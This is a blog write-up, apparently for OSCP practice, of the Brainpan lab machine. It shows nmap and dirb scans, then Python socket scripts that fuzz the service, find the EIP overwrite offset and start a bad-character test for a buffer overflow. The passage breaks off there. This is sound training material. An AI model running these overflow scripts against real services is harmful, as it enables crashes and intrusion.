<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>TryHackMe/Vulnhub - Brainpan | amirr0r</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="TryHackMe/Vulnhub - Brainpan" /><meta name="author" content="amirr0r" /><meta property="og:locale" content="en_US" /><meta name="description" content="Originally posted on Vulnhub by superkojiman, Brainpan is a vulnerable machine, highly recommended to complete before taking the OSCP exam due to the buffer overflow vulnerability that has to exploited." /><meta property="og:description" content="Originally posted on Vulnhub by superkojiman, Brainpan is a vulnerable machine, highly recommended to complete before taking the OSCP exam due to the buffer overflow vulnerability that has to exploited." /><link rel="canonical" href="https://amirr0r.github.io/posts/thm-brainpan/" /><meta property="og:url" content="https://amirr0r.github.io/posts/thm-brainpan/" /><meta property="og:site_name" content="amirr0r" /><meta property="og:image" content="https://amirr0r.github.io/assets/img/thm/linux/brainpan/Brainpan.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-08-02T18:50:19+02:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://amirr0r.github.io/assets/img/thm/linux/brainpan/Brainpan.png" /><meta property="twitter:title" content="TryHackMe/Vulnhub - Brainpan" /><meta name="twitter:site" content="@amirr0r_" /><meta name="twitter:creator" content="@amirr0r" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Originally posted on Vulnhub by superkojiman, Brainpan is a vulnerable machine, highly recommended to complete before taking the OSCP exam due to the buffer overflow vulnerability that has to exploited.","headline":"TryHackMe/Vulnhub - Brainpan","dateModified":"2021-08-02T18:50:19+02:00","datePublished":"2021-08-02T18:50:19+02:00","@type":"BlogPosting","image":"https://amirr0r.github.io/assets/img/thm/linux/brainpan/Brainpan.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://amirr0r.github.io/posts/thm-brainpan/"},"url":"https://amirr0r.github.io/posts/thm-brainpan/","author":{"@type":"Person","name":"amirr0r"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">amirr0r</a></div><div class="site-subtitle font-italic"></div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/amirr0r" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/amirr0r_" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/amir-barnat/?locale=en_US" target="_blank"> <i class="fab fa-linkedin-in"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>TryHackMe/Vulnhub - Brainpan</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Mon, Aug 2, 2021, 6:50 PM +0200" > Aug 2, 2021 <i class="unloaded">2021-08-02T18:50:19+02:00</i> </span> by <span class="author"> amirr0r </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Tue, Aug 10, 2021, 7:03 PM +0200" > Aug 10, 2021 <i class="unloaded">2021-08-10T19:03:38+02:00</i> </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/Brainpan.png" class="post-preview-img"><p>Originally posted on <strong>Vulnhub</strong> by <a href="https://www.vulnhub.com/entry/brainpan-1,51/">superkojiman</a>, <a href="https://tryhackme.com/room/brainpan">Brainpan</a> is a vulnerable machine, highly recommended to complete before taking the OSCP exam due to the buffer overflow vulnerability that has to exploited.</p><p>The vulnerable program is a Windows executable.</p><p>We will analyze and exploit it from our Kali Linux machine.</p><h2 id="enumeration">Enumeration</h2><h3 id="nmap-scan"><code class="language-plaintext highlighter-rouge">nmap</code> scan</h3><p><code class="language-plaintext highlighter-rouge">nmap</code> reveals two open ports:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-min-rate</span> 5000 <span class="nt">--max-retries</span> 1 <span class="nt">-sV</span> <span class="nt">-oN</span> brainpan.txt 10.10.92.146
Nmap scan report <span class="k">for </span>10.10.92.146
Host is up <span class="o">(</span>0.037s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 <span class="o">(</span>Python 2.7.3<span class="o">)</span>
</pre></table></code></div></div><p>I couldn’t figure out which OS is running on the target machine using <a href="https://nmap.org/book/man-os-detection.html"><code class="language-plaintext highlighter-rouge">nmap -O</code></a> so I pinged it and I assumed it was a Linux server because of the TTL value (See <a href="https://subinsb.com/default-device-ttl-values/">default TTL (Time To Live) values of different OS</a>):</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>$ ping -c3 10.10.92.146
PING 10.10.92.146 (10.10.92.146) 56(84) bytes of data.
64 bytes from 10.10.92.146: icmp_seq=1 ttl=63 time=37.7 ms
64 bytes from 10.10.92.146: icmp_seq=2 ttl=63 time=37.6 ms
64 bytes from 10.10.92.146: icmp_seq=3 ttl=63 time=37.2 ms

--- 10.10.92.146 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 37.203/37.503/37.704/0.216 ms
</pre></table></code></div></div><h3 id="port-9999-brainpan">Port 9999 (Brainpan)</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/brainpan-9999.png" alt="" /></p><h3 id="port-10000-simplehttpserver">Port 10000 (SimpleHTTPServer)</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/brainpan-10000.png" alt="" /></p><p><code class="language-plaintext highlighter-rouge">dirb</code> can help us to find a <code class="language-plaintext highlighter-rouge">/bin</code> directory on the web page:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre><span class="nv">$ </span>dirb http://<span class="nv">$TARGET</span>:10000 <span class="nt">-o</span> services/10000-http.txt

<span class="nt">-----------------</span>
DIRB v2.22    
By The Dark Raver
<span class="nt">-----------------</span>

OUTPUT_FILE: services/10000-http.txt
START_TIME: Sun Aug  1 18:09:55 2021
URL_BASE: http://10.10.92.146:10000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

<span class="nt">-----------------</span>

GENERATED WORDS: 4612                                                          

<span class="nt">----</span> Scanning URL: http://10.10.92.146:10000/ <span class="nt">----</span>
+ http://10.10.92.146:10000/bin <span class="o">(</span>CODE:301|SIZE:0<span class="o">)</span>                                                                                                          
+ http://10.10.92.146:10000/index.html <span class="o">(</span>CODE:200|SIZE:215<span class="o">)</span>
                                                                                                                                                            
<span class="nt">-----------------</span>
END_TIME: Sun Aug  1 18:15:39 2021
DOWNLOADED: 4612 - FOUND: 2
</pre></table></code></div></div><p>An executable called <code class="language-plaintext highlighter-rouge">brainpan.exe</code> can be downloaded from here:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/bin-directory.png" alt="" /></p><p>Using <code class="language-plaintext highlighter-rouge">file</code> tells us this a 32-bit Windows program:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>file brainpan.exe 
brainpan.exe: PE32 executable <span class="o">(</span>console<span class="o">)</span> Intel 80386 <span class="o">(</span>stripped to external PDB<span class="o">)</span>, <span class="k">for </span>MS Windows
</pre></table></code></div></div><hr /><h2 id="exploitation">Exploitation</h2><p>This executable is the same as the one on the port 9999 of the target machine.</p><p>In order to run it from our Kali Linux machine, we’ll be using <code class="language-plaintext highlighter-rouge">wine</code>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/wine.png" alt="" /></p><h3 id="step-1-fuzzing">Step 1: Fuzzing</h3><p>The program is waiting for password from the user input.</p><p>During this first step called “fuzzing”, we’ll be sending a bunch of characters in order to crash the program. This will potentially reveals a buffer overflow vulnerability.</p><p>I used the following script to do so:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="nb">buffer</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">100</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">'127.0.0.1'</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">9999</span>

<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
        <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
        <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">((</span><span class="sa">b</span><span class="s">"                          &gt;&gt; "</span> <span class="o">+</span> <span class="nb">buffer</span><span class="p">))</span>
        <span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="nb">buffer</span> <span class="o">=</span> <span class="nb">buffer</span> <span class="o">+</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">100</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Fuzzing crashed at </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">)</span><span class="si">}</span><span class="s"> bytes..."</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/41414141.png" alt="" /></p><p>As we can see from the screenshots above, the program tried to access to the address <strong>0x41414141</strong> and crashed.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/wine-error.png" alt="" /></p><p>This means we successfully overwrite <strong>EIP</strong> and the program crashed after copying 529 bytes to the buffer. Since <strong>0x41414141</strong> is just the hexadecimal representation of <strong>0xAAAA</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/debugger.png" alt="" /></p><h3 id="step-2-finding-the-offset">Step 2: Finding the offset</h3><p>Now, we want to know: how much characters do we need at least to crash the program?</p><p>This amount is called the <strong>offset</strong>. In order to find it, we can rely on two Metasploit scripts (called <code class="language-plaintext highlighter-rouge">pattern_create.rb</code> and <code class="language-plaintext highlighter-rouge">pattern_offset.rb</code>) or simply go manually.</p><h4 id="method1-pattern_create--pattern_offset">Method#1: <code class="language-plaintext highlighter-rouge">pattern_create</code> + <code class="language-plaintext highlighter-rouge">pattern_offset</code></h4><ul><li>We create a pattern of 529 characters with <code class="language-plaintext highlighter-rouge">pattern_create.rb</code>:</li></ul><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>/usr/share/metasploit-framework/tools/exploit/pattern_create.rb <span class="nt">-l</span> 529 <span class="o">&gt;</span> pattern.txt
</pre></table></code></div></div><ul><li>We send this pattern to our wine local instance of <code class="language-plaintext highlighter-rouge">brainpan.exe</code>:</li></ul><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">time</span>

<span class="n">target</span> <span class="o">=</span> <span class="s">'127.0.0.1'</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">9999</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"pattern.txt"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="nb">buffer</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">().</span><span class="n">strip</span><span class="p">().</span><span class="n">encode</span><span class="p">()</span>

<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">((</span><span class="sa">b</span><span class="s">"                          &gt;&gt; "</span> <span class="o">+</span> <span class="nb">buffer</span><span class="p">))</span>
<span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</pre></table></code></div></div><ul><li>We inspect the value of <code class="language-plaintext highlighter-rouge">EIP</code>:</li></ul><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/pattern.png" alt="" /></p><ul><li>We give this value to <code class="language-plaintext highlighter-rouge">pattern_offset.rb</code> to compute the exact number of characters needed to crash the program:</li></ul><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb <span class="nt">-q</span> 0x41357141
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 495
</pre></table></code></div></div><h4 id="method2-manually">Method#2: manually</h4><p>Since I saw the message <em>“529 bytes copied to buffer”</em> on the debug console, I tried many values (525, 500, …) until I found <strong>495</strong> was the exact offset.</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">offset</span> <span class="o">=</span> <span class="mi">495</span>
<span class="nb">buffer</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="n">offset</span> <span class="o">+</span> <span class="sa">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">4</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">'127.0.0.1'</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">9999</span>

<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">((</span><span class="sa">b</span><span class="s">"                          &gt;&gt; "</span> <span class="o">+</span> <span class="nb">buffer</span><span class="p">))</span>
<span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</pre></table></code></div></div><p>By placing <code class="language-plaintext highlighter-rouge">BBBB</code> at the end of my payload, I thought: <em>“I will find the offset after <code class="language-plaintext highlighter-rouge">EIP</code>’s value will be <code class="language-plaintext highlighter-rouge">42424242</code>“</em>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/42424242.png" alt="" /></p><h3 id="step-3-identifying-bad-characters-ollydbg">Step 3: Identifying bad characters (<code class="language-plaintext highlighter-rouge">ollydbg</code>)</h3><p>In order to generate a shellcode that will work, we have to identify the bad characters first:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="c1"># \x00
</span><span class="n">badchars</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff</span><span class="s">"</span>

<span class="n">offset</span> <span class="o">=</span> <span class="mi">495</span>
